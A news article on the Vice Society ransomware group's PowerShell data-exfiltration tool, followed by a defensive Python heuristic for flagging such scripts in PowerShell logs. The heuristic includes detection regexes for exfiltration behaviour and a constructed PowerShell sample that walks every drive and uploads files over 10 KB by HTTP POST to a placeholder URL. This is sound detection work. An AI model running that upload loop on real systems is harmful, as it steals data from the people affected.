Vice Society ransomware adopted an elusive tactic to steal data

May 4, 2023

The Vice Society ransomware group and its affiliates have been using a new PowerShell-based tool to bypass detection while exfiltrating data from compromised networks. According to reports, the threat actors rely on a built-in data exfiltration routine, which removes the need to drop external tools that security software or human-based detection mechanisms could flag as malicious.

Because the tool lives in PowerShell, it can also blend into the general operating infrastructure, allowing the threat actors to slip past security controls that look for foreign binaries.


Microsoft first identified the Vice Society ransomware group a couple of years ago.


Microsoft first tracked the Vice Society ransomware group as DEV-0832. The group is a cybercriminal operation that has prioritised extortion since its initial appearance in May 2021. In addition, the group has relied heavily on ransomware binaries available on underground markets.

In December last year, a cybersecurity researcher revealed that the group used a ransomware variant called PolyVice, which employs a hybrid encryption scheme mixing asymmetric and symmetric encryption to carry out the file encryption process.

Researchers recently discovered a PowerShell script that identifies the mounted drives on a system and searches through each root directory to stage data for exfiltration over HTTP.

Furthermore, the malicious tool applies exclusion criteria that filter out system files, backups, and folders belonging to web browsers and security solutions from various well-known providers. Cybersecurity experts claimed that the PowerShell developer demonstrated high-level coding skill, making the tool sophisticated.

This data exfiltration discovery shows that the actors still apply double extortion tactics in their ransomware attacks. These attacks also remind organisations to employ more competent security protections and to stay informed about evolving threats.

The threat actors use multi-processing and queuing so that the script does not consume most of the system's resources. The script only prioritises files larger than 10 KB that carry targeted file extensions and sit in directories matching its criteria; information that does not fit the targeted description is not exfiltrated.
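As an added defender-side example (not the group's tool and not code from the report), the following Python triage heuristic runs over constructed PowerShell script-block log text (Event ID 4104) and flags blocks where the behaviours described above co-occur: drive enumeration, recursive file walking, a file-size floor, HTTP upload and parallel workers. The cmdlet patterns and the two sample blocks are assumptions chosen to illustrate the profile.

```python
import re

# Regexes for common ways a PowerShell script performs each step (assumed, not
# taken from the actual tool). Any one alone is routine admin activity.
INDICATORS = {
    "drive_enum": [r"Get-PSDrive", r"Win32_LogicalDisk", r"DriveInfo\]::GetDrives"],
    "recursive_walk": [r"Get-ChildItem[^\n|]*-Recurse", r"EnumerateFiles\("],
    "size_floor": [r"\.Length\s*-[gl]t\s*\d+\s*KB", r"\.Length\s*-[gl]t\s*\d{4,}"],
    "http_upload": [r"Invoke-WebRequest[^\n]*-Method\s+Post",
                    r"Invoke-RestMethod[^\n]*-Method\s+Post", r"UploadFile\("],
    "parallelism": [r"RunspacePool", r"Start-Job", r"Start-ThreadJob", r"ConcurrentQueue"],
}

def score_script_block(text: str) -> dict:
    """Return which indicator categories appear in one script block."""
    return {cat: any(re.search(p, text, re.IGNORECASE) for p in pats)
            for cat, pats in INDICATORS.items()}

def is_suspicious(text: str, min_categories: int = 3) -> bool:
    """Flag a block only when an HTTP upload co-occurs with several other
    categories; the combination, not any single cmdlet, matches the profile."""
    hits = score_script_block(text)
    return hits["http_upload"] and sum(hits.values()) >= min_categories

def triage(events: dict) -> list:
    """Return the names of events whose ScriptBlockText matches the profile."""
    return [name for name, text in events.items() if is_suspicious(text)]

# Constructed samples standing in for the ScriptBlockText field of two events.
BENIGN_INVENTORY = """Get-PSDrive -PSProvider FileSystem | ForEach-Object {
  Get-ChildItem $_.Root -Recurse -File | Measure-Object -Property Length -Sum
}"""
SUSPECT_BLOCK = """$drives = Get-PSDrive -PSProvider FileSystem
$pool = [runspacefactory]::CreateRunspacePool(1, 8)
foreach ($d in $drives) {
  Get-ChildItem $d.Root -Recurse -File | Where-Object { $_.Length -gt 10KB } |
    ForEach-Object { Invoke-WebRequest -Uri $uploadUrl -Method Post -InFile $_.FullName }
}"""

if __name__ == "__main__":
    print(triage({"inventory": BENIGN_INVENTORY, "suspect": SUSPECT_BLOCK}))  # ['suspect']
```

The benign inventory script trips two categories (drive enumeration and recursion) but has no upload, so it is not flagged; the threshold and patterns should be tuned against your own script-block baseline.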
